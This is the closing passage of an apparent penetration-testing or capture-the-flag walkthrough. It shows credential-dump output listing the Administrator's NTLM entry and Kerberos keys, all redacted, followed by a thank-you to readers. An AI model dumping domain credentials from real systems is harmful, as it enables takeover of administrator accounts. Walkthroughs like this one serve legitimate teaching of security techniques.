Administrator:500:REDACTED:REDACTED:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:REDACTED
Administrator:aes128-cts-hmac-sha1-96:REDACTED
Administrator:des-cbc-md5:REDACTED
[*] Cleaning up...
Thank you for reading this walkthrough, I hope you have learned some new techniques to write down in your notes! =)